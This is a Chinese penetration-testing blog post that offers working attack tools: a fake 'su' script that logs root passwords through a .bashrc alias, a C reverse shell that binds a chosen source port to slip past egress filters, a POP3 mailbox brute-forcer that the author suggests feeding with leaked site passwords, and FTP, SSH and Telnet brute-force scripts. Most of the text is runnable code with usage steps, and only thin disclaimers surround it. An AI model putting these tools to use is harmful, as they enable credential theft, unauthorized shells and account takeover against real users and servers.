0x00
渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
0x01
记录root密码小工具
root.py
1 #!/usr/bin/python 2 import os, sys, getpass, time 3 4 current_time = time.strftime("%Y-%m-%d %H:%M") 5 logfile="/dev/shm/.su.log" //密码获取后记录在这里 6 #CentOS 7 #fail_str = "su: incorrect password" 8 #Ubuntu 9 #fail_str = "su: Authentication failure" 10 #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样 11 fail_str = "su: incorrect password" 12 try: 13 passwd = getpass.getpass(prompt='Password: '); 14 file=open(logfile,'a') 15 file.write("[%s]t%s"%(passwd, current_time)) //截取root密码 16 file.write('n') 17 file.close() 18 except: 19 pass 20 time.sleep(1) 21 print fail_str //打印切换root失败提示
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py'; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
0x02
设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,
Ping了下百度 可以ping通,
那真相只有一个
服务器变态的限制了只能某些提供已某些端口为源端口去连接外面
比如
只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
1 #include <stdio.h> 2 #include <sys/types.h> 3 #include <sys/socket.h> 4 #include <netinet/in.h> 5 #include <netdb.h> 6 void error(char *msg) 7 { 8 perror(msg); 9 exit(0); 10 } 11 int main(int argc, char *argv[]) 12 { 13 int sockfd, portno, lportno,n; 14 struct sockaddr_in serv_addr; 15 struct sockaddr_in client_addr; 16 struct hostent *server; 17 char buffer[256]; 18 if (argc < 3) { 19 fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]); 20 exit(0); 21 } //三个参数,目标主机,目标主机端口,本地源端口 22 portno = atoi(argv[2]); 23 sockfd = socket(AF_INET, SOCK_STREAM, 0); 24 if (sockfd < 0) 25 error("ERROR opening socket"); 26 27 28 bzero((char *) &client_addr, sizeof(client_addr)); 29 lportno = atoi(argv[3]); 30 client_addr.sin_family = AF_INET; 31 client_addr.sin_addr.s_addr = INADDR_ANY; 32 client_addr.sin_port = htons(lportno); //设置源端口 33 if (bind(sockfd, (struct sockaddr *) &client_addr, 34 sizeof(client_addr)) < 0) 35 error("ERROR on binding"); 36 37 server = gethostbyname(argv[1]); 38 if (server == NULL) { 39 fprintf(stderr,"ERROR, no such host "); 40 exit(0); 41 } 42 bzero((char *) &serv_addr, sizeof(serv_addr)); 43 serv_addr.sin_family = AF_INET; 44 bcopy((char *)server->h_addr, 45 (char *)&serv_addr.sin_addr.s_addr, 46 server->h_length); 47 serv_addr.sin_port = htons(portno); 48 if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接 49 error("ERROR connecting"); 50 dup2(fd, 0); 51 dup2(fd, 1); 52 dup2(fd, 2); 53 execl("/bin/sh","sh -i", NULL); //执行shell 54 close(fd); 55 }
用法:
1 gcc client-port.c -o port
1 chmod +x port
1 ./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.91ri.org 80 80
成功反弹shell 提权成功
0x03 邮箱爆破脚本
某个时候 需要爆破一批邮箱
Burp163.pl
1 #!/usr/bin/perl 2 use Net::POP3; 3 $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com 4 $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); 5 print $pop->banner(); 6 $pop->quit; 7 $i=0; 8 open(fp1,"user.txt"); 9 @array1=<fp1>; 10 open(fp2,"pass.txt"); 11 @array2=<fp2>; //从文件中获取邮箱用户名及密码 12 foreach $a(@array1) { 13 $u=substr($a,0,length($a)-1); 14 $u=$u."@163.com"; 15 foreach $b(@array2) { 16 $p=substr($b,0,length($b)-1); 17 print "cracked with ".$u."-----".$p."n"; 18 $i=$i+1; 19 $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); 20 $m=$pop->login($u,$p); //尝试登录邮箱 21 if($m>0) 22 { 23 print $u."------------".$p."----"."success"."n"; 24 $pop->quit; 25 } //成功登录 26 else 27 { 28 print $u."------------".$p."----"."failed"."n"; 29 $pop->quit; //登录失败 30 } 31 } 32 } 33 print $i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
1 $email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说
这个有点鸡肋吧 万一邮箱的密码很复杂
呵呵
搞到了一个小站的数据,
用这个程序批量测试密码是否就是邮箱密码 呵呵
我啥都没说。
0x04
这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。
在渗透测试当中,免不了要进行密码破解。http://www.91ri.org/8696.html
0x01
FTP暴力破解脚本
1 #!/usr/bin/env python 2 #-*-coding = utf-8-*- 3 #author:@xfk 4 #blog:@blog.sina.com.cn/kaiyongdeng 5 #date:@2012-05-08 6 7 import sys, os, time 8 from ftplib import FTP 9 docs = """ 10 [*] This was written for educational purpose and pentest only. Use it at your own risk. 11 [*] Author will be not responsible for any damage! 12 [*] Toolname : ftp_bf.py 13 [*] Coder : 14 [*] Version : 0.1 15 [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt 16 """ 17 18 if sys.platform == 'linux' or sys.platform == 'linux2': 19 clearing = 'clear' 20 else: 21 clearing = 'cls' 22 os.system(clearing) 23 R = "\033[31m"; 24 G = "\033[32m"; 25 Y = "\033[33m" 26 END = "\033[0m" 27 def logo(): 28 print G+"\n |---------------------------------------------------------------|" 29 print " | |" 30 print " | blog.sina.com.cn/kaiyongdeng |" 31 print " | 08/05/2012 ftp_bf.py v.0.1 |" 32 print " | FTP Brute Forcing Tool |" 33 print " | |" 34 print " |---------------------------------------------------------------|\n" 35 print " \n [-] %s\n" % time.strftime("%X") 36 print docs+END 37 38 def help(): 39 print R+"[*]-t, --target ip/hostname <> Our target" 40 print "[*]-u, --usernamelist usernamelist <> usernamelist path" 41 print "[*]-p, --passwordlist passwordlist <> passwordlist path" 42 print "[*]-h, --help help <> print this help" 43 print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1) 44 45 def bf_login(hostname,username,password): 46 # sys.stdout.write("\r[!]Checking : %s " % (p)) 47 # sys.stdout.flush() 48 try: 49 ftp = FTP(hostname) 50 ftp.login(hostname,username, password) 51 ftp.retrlines('list') 52 ftp.quit() 53 print Y+"\n[!] w00t,w00t!!! We did it ! " 54 print "[+] Target : ",hostname, "" 55 print "[+] User : ",username, "" 56 print "[+] Password : ",password, ""+END 57 return 1 58 # sys.exit(1) 59 except Exception, e: 60 pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END 61 sys.exit(1) 62 63 def anon_login(hostname): 64 try: 65 print G+"\n[!] Checking for anonymous login.\n"+END 66 ftp = FTP(hostname) ftp.login() 67 ftp.retrlines('LIST') 68 print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END 69 ftp.quit() 70 except Exception, e: 71 print R+"\n[-] Anonymous login failed...\n"+END 72 pass 73 74 def main(): 75 logo() 76 try: 77 for arg in sys.argv: 78 if arg.lower() == '-t' or arg.lower() == '--target': 79 hostname = sys.argv[int(sys.argv[1:].index(arg))+2] 80 elif arg.lower() == '-u' or arg.lower() == '--usernamelist': 81 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2] 82 elif arg.lower() == '-p' or arg.lower() == '--passwordlist': 83 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 84 elif arg.lower() == '-h' or arg.lower() == '--help': 85 help() 86 elif len(sys.argv) <= 1: 87 help() 88 except: 89 print R+"[-]Cheak your parametars input\n"+END 90 help() 91 92 print G+"[!] BruteForcing target ..."+END 93 anon_login(hostname) 94 # print "here is ok" 95 # print hostname 96 try: 97 usernames = open(usernamelist, "r") 98 user = usernames.readlines() 99 count1 = 0 100 while count1 < len(user): 101 user[count1] = user[count1].strip() 102 count1 +=1 103 except: 104 print R+"\n[-] Cheak your usernamelist path\n"+END 105 sys.exit(1) 106 107 # print "here is ok ",usernamelist,passwordlist 108 try: 109 passwords = open(passwordlist, "r") 110 pwd = passwords.readlines() 111 count2 = 0 112 while count2 < len(pwd): 113 pwd[count2] = pwd[count2].strip() 114 count2 +=1 115 except: 116 print R+"\n[-] Check your passwordlist path\n"+END 117 sys.exit(1) 118 119 print G+"\n[+] Loaded:",len(user),"usernames" 120 print "\n[+] Loaded:",len(pwd),"passwords" 121 print "[+] Target:",hostname 122 print "[+] Guessing...\n"+END 123 for u in user: for p in pwd: 124 result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) 125 if result != 1: 126 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END 127 else: 128 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END 129 if not result : 130 print R+"\n[-]There is no username ans password enabled in the list." 131 print "[-]Exiting...\n"+END 132 133 if __name__ == "__main__": 134 main()
0x02
SSH暴力破解
1 #!/usr/bin/env python 2 #-*-coding = UTF-8-*- 3 #author@:dengyongkai 4 #blog@:blog.sina.com.cn/kaiyongdeng 5 6 7 import sys 8 import os 9 import time 10 #from threading import Thread 11 12 try: 13 from paramiko import SSHClient 14 from paramiko import AutoAddPolicy 15 except ImportError: 16 print G+''' 17 You need paramiko module. 18 http://www.lag.net/paramiko/ 19 Debian/Ubuntu: sudo apt-get install aptitude 20 : sudo aptitude install python-paramiko\n'''+END 21 sys.exit(1) 22 23 docs = """ 24 [*] This was written for educational purpose and pentest only. Use it at your own risk. 25 [*] Author will be not responsible for any damage! 26 [*] Toolname : ssh_bf.py 27 [*] Author : xfk 28 [*] Version : v.0.2 29 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] 30 """ 31 32 33 if sys.platform == 'linux' or sys.platform == 'linux2': 34 clearing = 'clear' 35 else: 36 clearing = 'cls' 37 os.system(clearing) 38 39 40 R = "\033[31m"; 41 G = "\033[32m"; 42 Y = "\033[33m" 43 END = "\033[0m" 44 45 46 def logo(): 47 print G+"\n |---------------------------------------------------------------|" 48 print " | |" 49 print " | blog.sina.com.cn/kaiyongdeng |" 50 print " | 16/05/2012 ssh_bf.py v.0.2 |" 51 print " | SSH Brute Forcing Tool |" 52 print " | |" 53 print " |---------------------------------------------------------------|\n" 54 print " \n [-] %s\n" % time.ctime() 55 print docs+END 56 57 58 def help(): 59 print Y+" [*]-H --hostname/ip <>the target hostname or ip address" 60 print " [*]-P --port <>the ssh service port(default is 22)" 61 print " [*]-U --usernamelist <>usernames list file" 62 print " [*]-P --passwordlist <>passwords list file" 63 print " [*]-H --help <>show help information" 64 print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END 65 sys.exit(1) 66 67 def BruteForce(hostname,port,username,password): 68 ''' 69 Create SSH connection to target 70 ''' 71 ssh = SSHClient() 72 ssh.set_missing_host_key_policy(AutoAddPolicy()) 73 try: 74 ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) 75 status = 'ok' 76 ssh.close() 77 except Exception, e: 78 status = 'error' 79 pass 80 return status 81 82 83 def makelist(file): 84 ''' 85 Make usernames and passwords lists 86 ''' 87 items = [] 88 89 try: 90 fd = open(file, 'r') 91 except IOError: 92 print R+'unable to read file \'%s\'' % file+END 93 pass 94 95 except Exception, e: 96 print R+'unknown error'+END 97 pass 98 99 for line in fd.readlines(): 100 item = line.replace('\n', '').replace('\r', '') 101 items.append(item) 102 fd.close() 103 return items 104 105 def main(): 106 logo() 107 # print "hello wold" 108 try: 109 for arg in sys.argv: 110 if arg.lower() == '-t' or arg.lower() == '--target': 111 hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2]) 112 if arg.lower() == '-p' or arg.lower() == '--port': 113 port = sys.argv[int(sys.argv[1:].index(arg))+2] 114 elif arg.lower() == '-u' or arg.lower() == '--userlist': 115 userlist = sys.argv[int(sys.argv[1:].index(arg))+2] 116 elif arg.lower() == '-w' or arg.lower() == '--wordlist': 117 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 118 elif arg.lower() == '-h' or arg.lower() == '--help': 119 help() 120 elif len(sys.argv) <= 1: 121 help() 122 except: 123 print R+"[-]Cheak your parametars input\n"+END 124 help() 125 print G+"\n[!] BruteForcing target ...\n"+END 126 # print "here is ok" 127 # print hostname,port,wordlist,userlist 128 usernamelist = makelist(userlist) 129 passwordlist = makelist(wordlist) 130 131 print Y+"[*] SSH Brute Force Praparing." 132 print "[*] %s user(s) loaded." % str(len(usernamelist)) 133 print "[*] %s password(s) loaded." % str(len(passwordlist)) 134 print "[*] Brute Force Is Starting......."+END 135 try: 136 for username in usernamelist: 137 for password in passwordlist: 138 print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END 139 current = BruteForce(hostname, port, username, password) 140 if current == 'error': 141 print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END 142 # pass 143 else: 144 print G+"\n[+] ^-^ HaHa,We Got It!!!" 145 print "[+] username: %s" % username 146 print "[+] password: %s\n" % password+END 147 # sys.exit(0) 148 except: 149 print R+"\n[-] There Is Something Wrong,Pleace Cheak It." 150 print "[-] Exitting.....\n"+END 151 raise 152 print Y+"[+] Done.^-^\n"+END 153 sys.exit(0) 154 155 156 if __name__ == "__main__": 157 main()
0x03
TELNET密码暴力破解
1 #!usr/bin/python 2 #Telnet Brute Forcer 3 #http://www.darkc0de.com 4 #d3hydr8[at]gmail[dot]com 5 6 import threading, time, random, sys, telnetlib 7 from copy import copy 8 9 if len(sys.argv) !=4: 10 print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" 11 sys.exit(1) 12 13 try: 14 users = open(sys.argv[2], "r").readlines() 15 except(IOError): 16 print "Error: Check your userlist path\n" 17 sys.exit(1) 18 19 try: 20 words = open(sys.argv[3], "r").readlines() 21 except(IOError): 22 print "Error: Check your wordlist path\n" 23 sys.exit(1) 24 25 print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0" 26 print "\t--------------------------------------------------\n" 27 print "[+] Server:",sys.argv[1] 28 print "[+] Users Loaded:",len(users) 29 print "[+] Words Loaded:",len(words),"\n" 30 31 wordlist = copy(words) 32 33 def reloader(): 34 for word in wordlist: 35 words.append(word) 36 37 def getword(): 38 lock = threading.Lock() 39 lock.acquire() 40 if len(words) != 0: 41 value = random.sample(words, 1) 42 words.remove(value[0]) 43 44 else: 45 print "\nReloading Wordlist - Changing User\n" 46 reloader() 47 value = random.sample(words, 1) 48 users.remove(users[0]) 49 50 lock.release() 51 if len(users) ==1: 52 return value[0][:-1], users[0] 53 else: 54 return value[0][:-1], users[0][:-1] 55 56 class Worker(threading.Thread): 57 58 def run(self): 59 value, user = getword() 60 try: 61 print "-"*12 62 print "User:",user,"Password:",value 63 tn = telnetlib.Telnet(sys.argv[1]) 64 tn.read_until("login: ") 65 tn.write(user + "\n") 66 if password: 67 tn.read_until("Password: ") 68 tn.write(value + "\n") 69 tn.write("ls\n") 70 tn.write("exit\n") 71 print tn.read_all() 72 print "\t\nLogin successful:",value, user 73 tn.close() 74 work.join() 75 sys.exit(2) 76 except: 77 pass 78 79 for I in range(len(words)*len(users)): 80 work = Worker() 81 work.start() 82 time.sleep(1)